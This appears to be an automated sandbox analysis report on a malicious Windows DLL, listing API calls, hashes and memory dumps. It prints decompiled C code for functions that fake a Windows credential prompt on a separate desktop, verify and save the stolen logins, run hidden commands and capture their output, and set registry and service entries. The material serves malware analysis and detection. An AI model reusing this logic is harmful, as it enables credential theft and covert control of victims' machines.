                                                                                                        • StrChrW.SHLWAPI(7098C700,00000053,00000000), ref: 709841EC
                                                                                                        • StrChrW.SHLWAPI(7098C6E4,00000053,00000000,00000001,00000000), ref: 709841FA
                                                                                                        • RegSetValueExW.ADVAPI32(?,00000000), ref: 70984202
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 70984209
                                                                                                        • StrChrW.SHLWAPI ref: 70984229
                                                                                                        • StrChrW.SHLWAPI(7098C90C,00000055,00000000), ref: 70984233
                                                                                                        • StrChrW.SHLWAPI(7098C780,0000005C,00000000), ref: 7098423D
                                                                                                        • StrChrW.SHLWAPI(7098C740,00000053,00000000), ref: 70984247
                                                                                                        • wsprintfW.USER32 ref: 7098424F
                                                                                                        • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 70984272
                                                                                                        • RtlZeroMemory.NTDLL(?,0000020A), ref: 7098428A
                                                                                                        • StrChrW.SHLWAPI ref: 709842B7
                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000), ref: 709842BF
                                                                                                        • lstrcmpiW.KERNEL32(?,00B7C4E8), ref: 709842D5
                                                                                                        • StrChrW.SHLWAPI(7098C728,00000053,00000000,00000002,00B7C4E8,00000035), ref: 709842FB
                                                                                                        • RegSetValueExW.ADVAPI32(?,00000000), ref: 70984303
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 7098430A
                                                                                                        • RtlZeroMemory.NTDLL(?,00000024), ref: 70984317
                                                                                                        • QueryServiceStatusEx.ADVAPI32 ref: 70984333
                                                                                                        • StrChrW.SHLWAPI(7098C6AC,00000073), ref: 70984354
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,00000024), ref: 70984371
                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 7098437C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Value$Close$CreateServicewsprintf$Openlstrlen$HandleManagerMemoryQueryZero$ChangeConfig2Statuslstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 567274075-0
                                                                                                        • Opcode ID: eae204f389c1f621b27dd36b691c05d19db3884430729bffb298f8ab71c2c421
                                                                                                        • Instruction ID: 985342fdb1045be8696040687b4ae8c1befa1ec2a1fbcde9d4923bfbe8915419
                                                                                                        • Opcode Fuzzy Hash: eae204f389c1f621b27dd36b691c05d19db3884430729bffb298f8ab71c2c421
                                                                                                        • Instruction Fuzzy Hash: 2CF13FB1754304BEE220DBA5CC4AF6F7BACEB84B45F104519B749AA2C0DBB4D9048F67
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70989B10, Relevance: 77.3, APIs: 39, Strings: 5, Instructions: 349memorysleeplibraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 48%
                                                                                                        			E70989B10(intOrPtr _a4) {
				intOrPtr _v4;
				signed int _v72;
				char _v1028;
				short _v1036;
				char _v1048;
				void* _v1556;
				short _v1560;
				void* _v1564;
				intOrPtr _v1568;
				void* _v1572;
				void* _v1576;
				void* _v1580;
				intOrPtr _v1584;
				void* _v1588;
				void* _v1592;
				void* _v1596;
				intOrPtr _v1600;
				void* _v1604;
				void* _v1608;
				void* _v1612;
				char _v1616;
				WCHAR* _v1628;
				short* _v1632;
				char _v1636;
				void* _v1640;
				intOrPtr _v1644;
				void* _v1652;
				intOrPtr _v1656;
				struct HINSTANCE__* _v1660;
				void* _v1664;
				char _v1672;
				char _v1676;
				void* _v1680;
				long _v1684;
				long _v1692;
				long _v1696;
				long _v1708;
				intOrPtr _v1712;
				long _v1716;
				intOrPtr _v1732;
				char _v1740;
				char _v1756;
				intOrPtr _v1760;
				intOrPtr _v1768;
				intOrPtr _v1784;
				void* _v1792;
				intOrPtr _v1804;
				void* _v1816;
				intOrPtr _t93;
				void* _t94;
				void* _t99;
				WCHAR* _t106;
				intOrPtr _t110;
				void* _t133;
				int _t141;
				signed int _t146;
				struct HDESK__* _t150;
				void* _t153;
				struct HINSTANCE__* _t155;
				void* _t156;
				WCHAR* _t157;
				intOrPtr _t158;
				struct HDESK__* _t159;
				struct HDESK__* _t172;
				intOrPtr _t175;
				WCHAR* _t181;
				struct HDESK__* _t184;
				WCHAR* _t186;
				struct HINSTANCE__* _t189;
				short* _t191;
				void* _t192;
				signed int _t196;
				signed int _t197;
				WCHAR* _t200;
				long _t201;
				short* _t203;
				void* _t205;
				void* _t206;
				void* _t207;

				_t93 =  *0x7098f5b4; // 0xb71e90
				_t158 =  *0x7098f5a8; // 0xb76080
				_t94 = E709854A0(_t158, _t93, 0x7098c560);
				_t205 =  &_v1676 + 0xc;
				if(_t94 != 0) {
					L39:
					return 0;
				} else {
					_t153 = 0;
					if(_a4 != 0) {
						_t184 =  *0x7098f530; // 0x0
						SwitchDesktop(_t184);
						_t150 =  *0x7098f530; // 0x0
						SetThreadDesktop(_t150);
					}
					_t189 = LoadLibraryW(L"credui.dll");
					_v1640 = _t189;
					if(_t189 == _t153) {
						L37:
						if(_a4 != _t153) {
							Sleep(0x7d0);
							_t159 =  *0x7098f534; // 0x0
							SwitchDesktop(_t159);
							_t172 =  *0x7098f534; // 0x0
							SetThreadDesktop(_t172);
						}
						goto L39;
					}
					_push(0xff000000);
					_push(4);
					_push( &_v1616);
					_push(_t189);
					_v1616 = 0x24bec39d;
					_v1612 = _t153;
					_v1608 = _t153;
					_v1604 = _t153;
					_v1600 = 0xb4bb2c26;
					_v1596 = _t153;
					_v1592 = _t153;
					_v1588 = _t153;
					_v1584 = 0x4b177521;
					_v1580 = _t153;
					_v1576 = _t153;
					_v1572 = _t153;
					_v1568 = 0xc07eb83e;
					_v1564 = _t153;
					_v1560 = _t153;
					_v1556 = _t153;
					_t99 = E70981E40();
					_t206 = _t205 + 0x10;
					if(_t99 == 0) {
						L36:
						FreeLibrary(_t189);
						goto L37;
					}
					_t186 = HeapAlloc(GetProcessHeap(), 8, 0x2000);
					if(_t186 == _t153) {
						L35:
						goto L36;
					}
					_push(0x14);
					_push( &_v1636);
					L7098BF02();
					_v1644 = 0x14;
					_v1640 = _t153;
					_v1672 = 0x202;
					_v1656 = 0x101;
					_t26 =  &(_t186[0x657]); // 0xcae
					_t191 = _t26;
					_t27 =  &(_t186[0x6d8]); // 0xdb0
					_t200 = _t27;
					GetSystemDirectoryW( &_v1560, 0x104);
					PathAddBackslashW( &_v1560);
					_t106 = L"rstrui.exe";
					if(_v4 != _t153) {
						_t106 = L"wuaueng.dll";
					}
					lstrcatW( &_v1560, _t106);
					_t155 = LoadLibraryExW( &_v1560, _t153, 0x20);
					if(_t155 == 0) {
						L20:
						_t175 =  *0x7098f5a8; // 0xb76080
						_t110 =  *0x7098f5b4; // 0xb71e90
						_t201 = 0;
						_t192 = 0;
						_v1652 = 0;
						_v1684 = 0;
						_v1676 = 0;
						_v1664 = 0;
						_v1680 = 0;
						wsprintfW( &_v1036, L"%s\\%s", _t110, _t175);
						_t207 = _t206 + 0x10;
						_push( &_v1672);
						_push(0);
						_push(0x7098c560);
						_push( &_v1028);
						_push(0);
						if(_v1556() != 0 || GetLastError() != 0x7a) {
							L34:
							HeapFree(GetProcessHeap(), _t201, _t186);
							_t189 = _v1660;
							_t153 = 0;
							goto L35;
						} else {
							_t156 = HeapAlloc(GetProcessHeap(), 8, _v1692);
							_v1680 = _t156;
							if(_t156 == 0) {
								goto L34;
							}
							_push( &_v1692);
							_push(_t156);
							_push(0x7098c560);
							_push( &_v1048);
							_push(0);
							if(_v1576() == 0) {
								L33:
								HeapFree(GetProcessHeap(), _t201, _t156);
								goto L34;
							}
							while(1) {
								L25:
								_push(0x20);
								_push( &_v1696);
								_push( &_v1708);
								_push( &_v1716);
								_push(_v1712);
								_push(_t156);
								_push( &_v1684);
								_push(_t192);
								_push( &_v1676);
								_v1692 = 1;
								_v1684 = _t201;
								_v1716 = _t201;
								_v1708 = _t201;
								_v1696 = _t201;
								if(_v1644() != 0) {
									break;
								}
								_push(0x404);
								_push(_t186);
								_v1740 = 0x202;
								L7098BF02();
								_push(0x202);
								_t74 =  &(_t186[0x202]); // 0x404
								_t157 = _t74;
								_push(_t157);
								_v1732 = 0x101;
								L7098BF02();
								_push( &_v1740);
								_push(_t157);
								_push(_t201);
								_push(_t201);
								_push( &_v1756);
								_push(_t186);
								_push(_v1760);
								_push(_v1768);
								_push(1);
								if(_v1680() != 0) {
									_push(0x404);
									_t81 =  &(_t186[0x303]); // 0x606
									_t203 = _t81;
									_push(_t203);
									L7098BF02();
									_push(0x2a4);
									_t82 =  &(_t186[0x505]); // 0xa0a
									L7098BF02();
									_push(0x152);
									_t83 =  &(_t186[0x505]); // 0xa0a
									_push(0x202);
									_push(_t203);
									_push(_t186);
									if(_v1716() == 0) {
										_t85 =  &(_t186[0x505]); // 0xa0a
										_t133 = E709854A0(_t203, _t85, _t157);
										_t207 = _t207 + 0xc;
										if(_t133 == 0) {
											_v1816 = 0;
											_t192 = 0x52e;
										} else {
											_t181 =  *0x7098f580; // 0xb7ea60
											WritePrivateProfileStringW(StrChrW(0x7098cddc, 0x50), _t186, _t157, _t181);
										}
									}
									_t201 = 0;
								}
								__imp__CoTaskMemFree(_v1804);
								_t156 = _v1792;
								if(_v1784 == _t201) {
									continue;
								} else {
									goto L33;
								}
							}
							asm("sbb esi, esi");
							_t192 = ( ~_v72 & 0xfffff693) + 0xfdb;
							Sleep(0x1f4);
							goto L25;
						}
					} else {
						_push(0x80);
						_push(_t191);
						if(_v4 != 0) {
							if(LoadStringW(_t155, 0x69, ??, ??) > 0) {
								_v1632 = _t191;
							}
							_t196 = FormatMessageW(0xaff, _t155, 0xb0000028, 0, _t200, 0x926, 0);
							_t197 = _t196 + LoadStringW(_t155, 0x184,  &(_t200[_t196]), 0x926 - _t196);
							_t141 = wsprintfW( &(_t200[_t197]), L"\r\n\r\n");
							_t206 = _t206 + 8;
							FormatMessageW(0x12ff, 0, 0x1109, 0,  &(_t200[_t197 + _t141]), 0x926 - _t197 + _t141, 0);
							L18:
							_v1628 = _t200;
							L19:
							FreeLibrary(_t155);
							goto L20;
						}
						_t146 = LoadStringW(_t155, 0xab, ??, ??);
						if(_t146 > 0) {
							_t34 = _t146 * 2; // 0xcb2
							_t191[_t146] = 0x20002e;
							if(LoadStringW(_t155, 0x91, _t191 + _t34 + 4, 0x80 - _t146) > 0) {
								_v1632 = _t191;
							}
						}
						if(LoadStringW(_t155, 0xd2, _t200, 0x926) <= 0) {
							goto L19;
						} else {
							goto L18;
						}
					}
				}
			}


















































































                                                                                                        0x70989b10
                                                                                                        0x70989b15
                                                                                                        0x70989b28
                                                                                                        0x70989b2d
                                                                                                        0x70989b32
                                                                                                        0x70989fe4
                                                                                                        0x70989fec
                                                                                                        0x70989b38
                                                                                                        0x70989b39
                                                                                                        0x70989b43
                                                                                                        0x70989b45
                                                                                                        0x70989b4c
                                                                                                        0x70989b52
                                                                                                        0x70989b58
                                                                                                        0x70989b58
                                                                                                        0x70989b69
                                                                                                        0x70989b6b
                                                                                                        0x70989b71
                                                                                                        0x70989fb4
                                                                                                        0x70989fbd
                                                                                                        0x70989fc4
                                                                                                        0x70989fca
                                                                                                        0x70989fd1
                                                                                                        0x70989fd7
                                                                                                        0x70989fde
                                                                                                        0x70989fde
                                                                                                        0x00000000
                                                                                                        0x70989fbd
                                                                                                        0x70989b77
                                                                                                        0x70989b7c
                                                                                                        0x70989b82
                                                                                                        0x70989b83
                                                                                                        0x70989b84
                                                                                                        0x70989b8c
                                                                                                        0x70989b90
                                                                                                        0x70989b94
                                                                                                        0x70989b98
                                                                                                        0x70989ba0
                                                                                                        0x70989ba4
                                                                                                        0x70989ba8
                                                                                                        0x70989bac
                                                                                                        0x70989bb4
                                                                                                        0x70989bb8
                                                                                                        0x70989bbc
                                                                                                        0x70989bc3
                                                                                                        0x70989bce
                                                                                                        0x70989bd5
                                                                                                        0x70989bdc
                                                                                                        0x70989be3
                                                                                                        0x70989be8
                                                                                                        0x70989bed
                                                                                                        0x70989fad
                                                                                                        0x70989fae
                                                                                                        0x00000000
                                                                                                        0x70989fae
                                                                                                        0x70989c08
                                                                                                        0x70989c0c
                                                                                                        0x70989fac
                                                                                                        0x00000000
                                                                                                        0x70989fac
                                                                                                        0x70989c13
                                                                                                        0x70989c19
                                                                                                        0x70989c1a
                                                                                                        0x70989c2c
                                                                                                        0x70989c34
                                                                                                        0x70989c38
                                                                                                        0x70989c40
                                                                                                        0x70989c48
                                                                                                        0x70989c48
                                                                                                        0x70989c4e
                                                                                                        0x70989c4e
                                                                                                        0x70989c54
                                                                                                        0x70989c62
                                                                                                        0x70989c68
                                                                                                        0x70989c74
                                                                                                        0x70989c76
                                                                                                        0x70989c76
                                                                                                        0x70989c84
                                                                                                        0x70989c9b
                                                                                                        0x70989c9f
                                                                                                        0x70989d98
                                                                                                        0x70989d98
                                                                                                        0x70989d9e
                                                                                                        0x70989da5
                                                                                                        0x70989db4
                                                                                                        0x70989db6
                                                                                                        0x70989dba
                                                                                                        0x70989dbe
                                                                                                        0x70989dc2
                                                                                                        0x70989dc6
                                                                                                        0x70989dca
                                                                                                        0x70989dd0
                                                                                                        0x70989dd7
                                                                                                        0x70989dd8
                                                                                                        0x70989dd9
                                                                                                        0x70989de5
                                                                                                        0x70989de6
                                                                                                        0x70989df0
                                                                                                        0x70989f96
                                                                                                        0x70989f9f
                                                                                                        0x70989fa5
                                                                                                        0x70989fa9
                                                                                                        0x00000000
                                                                                                        0x70989e05
                                                                                                        0x70989e19
                                                                                                        0x70989e1b
                                                                                                        0x70989e21
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70989e2b
                                                                                                        0x70989e2c
                                                                                                        0x70989e2d
                                                                                                        0x70989e39
                                                                                                        0x70989e3a
                                                                                                        0x70989e44
                                                                                                        0x70989f87
                                                                                                        0x70989f90
                                                                                                        0x00000000
                                                                                                        0x70989f90
                                                                                                        0x70989e50
                                                                                                        0x70989e50
                                                                                                        0x70989e50
                                                                                                        0x70989e56
                                                                                                        0x70989e5f
                                                                                                        0x70989e64
                                                                                                        0x70989e65
                                                                                                        0x70989e66
                                                                                                        0x70989e6b
                                                                                                        0x70989e6c
                                                                                                        0x70989e71
                                                                                                        0x70989e72
                                                                                                        0x70989e7a
                                                                                                        0x70989e7e
                                                                                                        0x70989e82
                                                                                                        0x70989e86
                                                                                                        0x70989e90
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70989e96
                                                                                                        0x70989e9b
                                                                                                        0x70989e9c
                                                                                                        0x70989ea4
                                                                                                        0x70989ea9
                                                                                                        0x70989eae
                                                                                                        0x70989eae
                                                                                                        0x70989eb4
                                                                                                        0x70989eb5
                                                                                                        0x70989ebd
                                                                                                        0x70989eca
                                                                                                        0x70989ecf
                                                                                                        0x70989ed0
                                                                                                        0x70989ed1
                                                                                                        0x70989ed6
                                                                                                        0x70989ed7
                                                                                                        0x70989ed8
                                                                                                        0x70989ed9
                                                                                                        0x70989eda
                                                                                                        0x70989ee5
                                                                                                        0x70989eeb
                                                                                                        0x70989ef0
                                                                                                        0x70989ef0
                                                                                                        0x70989ef6
                                                                                                        0x70989ef7
                                                                                                        0x70989efc
                                                                                                        0x70989f01
                                                                                                        0x70989f08
                                                                                                        0x70989f0d
                                                                                                        0x70989f12
                                                                                                        0x70989f19
                                                                                                        0x70989f1e
                                                                                                        0x70989f1f
                                                                                                        0x70989f29
                                                                                                        0x70989f2c
                                                                                                        0x70989f34
                                                                                                        0x70989f39
                                                                                                        0x70989f3e
                                                                                                        0x70989f5f
                                                                                                        0x70989f67
                                                                                                        0x70989f40
                                                                                                        0x70989f40
                                                                                                        0x70989f57
                                                                                                        0x70989f57
                                                                                                        0x70989f3e
                                                                                                        0x70989f6c
                                                                                                        0x70989f6c
                                                                                                        0x70989f73
                                                                                                        0x70989f79
                                                                                                        0x70989f81
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70989f81
                                                                                                        0x70989ff8
                                                                                                        0x7098a005
                                                                                                        0x7098a00b
                                                                                                        0x00000000
                                                                                                        0x7098a00b
                                                                                                        0x70989ca5
                                                                                                        0x70989cad
                                                                                                        0x70989cb2
                                                                                                        0x70989cb3
                                                                                                        0x70989d17
                                                                                                        0x70989d19
                                                                                                        0x70989d19
                                                                                                        0x70989d38
                                                                                                        0x70989d53
                                                                                                        0x70989d5f
                                                                                                        0x70989d65
                                                                                                        0x70989d87
                                                                                                        0x70989d8d
                                                                                                        0x70989d8d
                                                                                                        0x70989d91
                                                                                                        0x70989d92
                                                                                                        0x00000000
                                                                                                        0x70989d92
                                                                                                        0x70989cbb
                                                                                                        0x70989cc3
                                                                                                        0x70989ccd
                                                                                                        0x70989cd8
                                                                                                        0x70989ce7
                                                                                                        0x70989ce9
                                                                                                        0x70989ce9
                                                                                                        0x70989ce7
                                                                                                        0x70989d01
                                                                                                        0x00000000
                                                                                                        0x70989d07
                                                                                                        0x00000000
                                                                                                        0x70989d07
                                                                                                        0x70989d01
                                                                                                        0x70989c9f

                                                                                                        APIs
                                                                                                          • Part of subcall function 709854A0: LogonUserW.ADVAPI32(00B76080,00B76080,70989B2D,00000002,00000000,00B71E90), ref: 709854C0
                                                                                                          • Part of subcall function 709854A0: GetLastError.KERNEL32(?,?,00B76080,70989B2D,00B76080,00B71E90,7098C560), ref: 709854CC
                                                                                                          • Part of subcall function 709854A0: CloseHandle.KERNEL32(00B71E90,?,?,00B76080,70989B2D,00B76080,00B71E90,7098C560), ref: 709854E7
                                                                                                        • SwitchDesktop.USER32(00000000), ref: 70989B4C
                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 70989B58
                                                                                                        • LoadLibraryW.KERNEL32(credui.dll), ref: 70989B63
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00002000,?,00000004,FF000000), ref: 70989BFB
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000004,FF000000), ref: 70989C02
                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 70989C1A
                                                                                                        • GetSystemDirectoryW.KERNEL32 ref: 70989C54
                                                                                                        • PathAddBackslashW.SHLWAPI(?), ref: 70989C62
                                                                                                        • lstrcatW.KERNEL32(?,rstrui.exe), ref: 70989C84
                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000020), ref: 70989C95
                                                                                                        • LoadStringW.USER32(00000000,000000AB,00000CAE,00000080), ref: 70989CBB
                                                                                                        • LoadStringW.USER32(00000000,00000091,00000CB2,00000080), ref: 70989CDF
                                                                                                        • LoadStringW.USER32(00000000,000000D2,00000DB0,00000926), ref: 70989CF9
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000926,00000000,?,?,00000004,FF000000), ref: 70989D92
                                                                                                        • wsprintfW.USER32 ref: 70989DCA
                                                                                                        • GetLastError.KERNEL32(?,?,00000004,FF000000), ref: 70989DF6
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,00000004,FF000000), ref: 70989E0C
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000004,FF000000), ref: 70989E13
                                                                                                        • RtlZeroMemory.NTDLL(00000000,00000404), ref: 70989EA4
                                                                                                        • RtlZeroMemory.NTDLL(00000404,00000202), ref: 70989EBD
                                                                                                        • RtlZeroMemory.NTDLL(00000606,00000404), ref: 70989EF7
                                                                                                        • RtlZeroMemory.NTDLL(00000A0A,000002A4), ref: 70989F08
                                                                                                        • StrChrW.SHLWAPI(7098CDDC,00000050,00000000,00000404,00B7EA60,?,?,?,?,00000020,?,?,00000004,FF000000), ref: 70989F50
                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,?,?,00000004), ref: 70989F57
                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 70989F73
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000004,FF000000), ref: 70989F89
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000004,FF000000), ref: 70989F90
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000004,FF000000), ref: 70989F98
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000004,FF000000), ref: 70989F9F
                                                                                                        • FreeLibrary.KERNEL32(00000000,00000004,FF000000), ref: 70989FAE
                                                                                                        • Sleep.KERNEL32(000007D0), ref: 70989FC4
                                                                                                        • SwitchDesktop.USER32(00000000), ref: 70989FD1
                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 70989FDE
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 7098A00B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$FreeLoadMemoryZero$DesktopLibraryProcessString$AllocErrorLastSleepSwitchThread$BackslashCloseDirectoryHandleLogonPathPrivateProfileSystemTaskUserWritelstrcatwsprintf
                                                                                                        • String ID: $%s\%s$credui.dll$rstrui.exe$wuaueng.dll
                                                                                                        • API String ID: 938628543-3234645550
                                                                                                        • Opcode ID: bf902292e04c7d715edaf1194abb34548828e666f397e949e3d80463f9a497c9
                                                                                                        • Instruction ID: bfbd0b9fe30532019df8bd5ccbec025c517c87d3f704dcf980ad18b1bfdb7147
                                                                                                        • Opcode Fuzzy Hash: bf902292e04c7d715edaf1194abb34548828e666f397e949e3d80463f9a497c9
                                                                                                        • Instruction Fuzzy Hash: 81D120B2618304AFE3109F65CC89F5FBBACFB88704F50492DF696963D1D774A8048B66
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70982FF0, Relevance: 56.2, APIs: 31, Strings: 1, Instructions: 227memoryfileprocessCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E70982FF0(intOrPtr* _a12) {
				intOrPtr* _v4;
				signed int _v8;
				WCHAR* _v12;
				intOrPtr _v16;
				struct _STARTUPINFOW _v84;
				struct _PROCESS_INFORMATION _v100;
				void* _v108;
				void* _v112;
				WCHAR* _v116;
				void* _v120;
				void* _v124;
				void* _v128;
				intOrPtr _v132;
				long _v136;
				WCHAR* _t52;
				int _t54;
				long _t69;
				intOrPtr _t82;
				long _t85;
				void* _t90;
				struct _OVERLAPPED* _t110;
				void* _t111;
				int _t112;
				int _t116;
				void* _t121;

				_t110 = 0;
				_v116 = 0;
				_t90 = 0;
				_v100.hThread.nLength = 0xc;
				_v100.dwProcessId = 0;
				_v100.dwThreadId = 1;
				_v112 = 0;
				_v108 = 0;
				if(CreatePipe( &_v112,  &_v108,  &(_v100.hThread), 0) == 0) {
					 *_a12 = 0;
					return 0;
				} else {
					_push(0x44);
					_push( &(_v84.dwX));
					L7098BF02();
					_t52 = _v116;
					_push(0x10);
					_push( &(_v100.dwProcessId));
					_v84.lpDesktop = 0x44;
					_v84.lpReserved2 = 0x101;
					_v12 = _t52;
					_v16 = _t52;
					L7098BF02();
					_t54 = CreateProcessW(0, _v12, 0, 0, 1, 0x8000000, 0, 0,  &_v84,  &_v100);
					CloseHandle(_v124);
					if(_t54 != 0) {
						_t111 = HeapAlloc(GetProcessHeap(), 8, 0x401);
						_v120 = _t111;
						if(_t111 != 0) {
							_v116 = GetTickCount() + _v8 * 0x3e8;
							_v136 = 0;
							if(ReadFile(_v128, _t111, 0x400,  &_v136, 0) != 0) {
								while(1) {
									_t69 = _v136;
									if(_t69 == 0) {
										goto L23;
									}
									 *((char*)(_t69 + _t111)) = 0;
									_t116 = MultiByteToWideChar(1, 0, _t111, _v136, 0, 0);
									if(_t116 != 0) {
										_t31 = _t116 + 2; // 0x2
										_t121 = HeapAlloc(GetProcessHeap(), 8, _t116 + _t31);
										if(_t121 != 0) {
											if(MultiByteToWideChar(1, 0, _t111, _v136, _t121, _t116) != 0) {
												_t112 = WideCharToMultiByte(0xfde9, 0, _t121, _t116, 0, 0, 0, 0);
												if(_t112 != 0) {
													_t82 = _v132 + _t112;
													_v132 = _t82;
													_push(_t82 + 1);
													if(_t90 != 0) {
														_t85 = HeapReAlloc(GetProcessHeap(), 0, _t90, ??);
														if(_t85 != 0) {
															goto L12;
														} else {
															HeapFree(GetProcessHeap(), _t85, _t90);
															_t90 = 0;
															goto L14;
														}
														goto L24;
													} else {
														_t85 = HeapAlloc(GetProcessHeap(), 8, ??);
														L12:
														_t90 = _t85;
														if(_t90 != 0) {
															WideCharToMultiByte(0xfde9, 0, _t121, _t116, _t90 - _t112 + _v132, _t112, 0, 0);
														}
													}
												}
												L14:
												_t111 = _v120;
											}
											HeapFree(GetProcessHeap(), 0, _t121);
										}
									}
									if(GetTickCount() >= _v116 || _t90 == 0) {
										_push(0);
										_push(_v100.hProcess);
										L7098BF20();
									} else {
										if(ReadFile(_v128, _t111, 0x400,  &_v136, 0) != 0) {
											continue;
										} else {
										}
									}
									goto L23;
								}
							}
							L23:
							HeapFree(GetProcessHeap(), 0, _t111);
						}
						L24:
						CloseHandle(_v100.hThread);
						CloseHandle(_v100);
						_t110 = _v132;
					}
					CloseHandle(_v128);
					 *_v4 = _t110;
					return _t90;
				}
			}




























                                                                                                        0x70982ff5
                                                                                                        0x70983007
                                                                                                        0x7098300b
                                                                                                        0x7098300d
                                                                                                        0x70983015
                                                                                                        0x70983019
                                                                                                        0x70983021
                                                                                                        0x70983025
                                                                                                        0x70983031
                                                                                                        0x70983293
                                                                                                        0x7098329c
                                                                                                        0x70983037
                                                                                                        0x70983039
                                                                                                        0x7098303f
                                                                                                        0x70983040
                                                                                                        0x70983045
                                                                                                        0x70983049
                                                                                                        0x7098304f
                                                                                                        0x70983050
                                                                                                        0x70983058
                                                                                                        0x70983060
                                                                                                        0x70983067
                                                                                                        0x7098306e
                                                                                                        0x70983091
                                                                                                        0x709830a4
                                                                                                        0x709830a8
                                                                                                        0x709830c2
                                                                                                        0x709830c4
                                                                                                        0x709830ca
                                                                                                        0x709830f0
                                                                                                        0x709830fa
                                                                                                        0x70983106
                                                                                                        0x70983110
                                                                                                        0x70983110
                                                                                                        0x70983116
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983120
                                                                                                        0x70983134
                                                                                                        0x70983138
                                                                                                        0x7098313e
                                                                                                        0x70983152
                                                                                                        0x70983156
                                                                                                        0x70983170
                                                                                                        0x70983189
                                                                                                        0x7098318d
                                                                                                        0x70983193
                                                                                                        0x70983195
                                                                                                        0x7098319a
                                                                                                        0x7098319d
                                                                                                        0x70983221
                                                                                                        0x70983229
                                                                                                        0x00000000
                                                                                                        0x7098322b
                                                                                                        0x70983234
                                                                                                        0x7098323a
                                                                                                        0x00000000
                                                                                                        0x7098323a
                                                                                                        0x00000000
                                                                                                        0x7098319f
                                                                                                        0x709831a8
                                                                                                        0x709831ae
                                                                                                        0x709831ae
                                                                                                        0x709831b2
                                                                                                        0x709831cb
                                                                                                        0x709831cb
                                                                                                        0x709831b2
                                                                                                        0x7098319d
                                                                                                        0x709831d1
                                                                                                        0x709831d1
                                                                                                        0x709831d1
                                                                                                        0x709831df
                                                                                                        0x709831df
                                                                                                        0x70983156
                                                                                                        0x709831ef
                                                                                                        0x70983242
                                                                                                        0x70983244
                                                                                                        0x70983245
                                                                                                        0x709831f5
                                                                                                        0x7098320f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983215
                                                                                                        0x7098320f
                                                                                                        0x00000000
                                                                                                        0x709831ef
                                                                                                        0x70983110
                                                                                                        0x7098324a
                                                                                                        0x70983254
                                                                                                        0x7098325a
                                                                                                        0x70983260
                                                                                                        0x70983265
                                                                                                        0x7098326c
                                                                                                        0x7098326e
                                                                                                        0x7098326e
                                                                                                        0x70983277
                                                                                                        0x70983282
                                                                                                        0x7098328b
                                                                                                        0x7098328b

                                                                                                        APIs
                                                                                                        • CreatePipe.KERNEL32 ref: 70983029
                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 70983040
                                                                                                        • RtlZeroMemory.NTDLL ref: 7098306E
                                                                                                        • CreateProcessW.KERNEL32 ref: 70983091
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 709830A4
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000401,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 709830B5
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 709830BC
                                                                                                        • GetTickCount.KERNEL32 ref: 709830D0
                                                                                                        • ReadFile.KERNEL32(?,00000000,00000400,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 709830FE
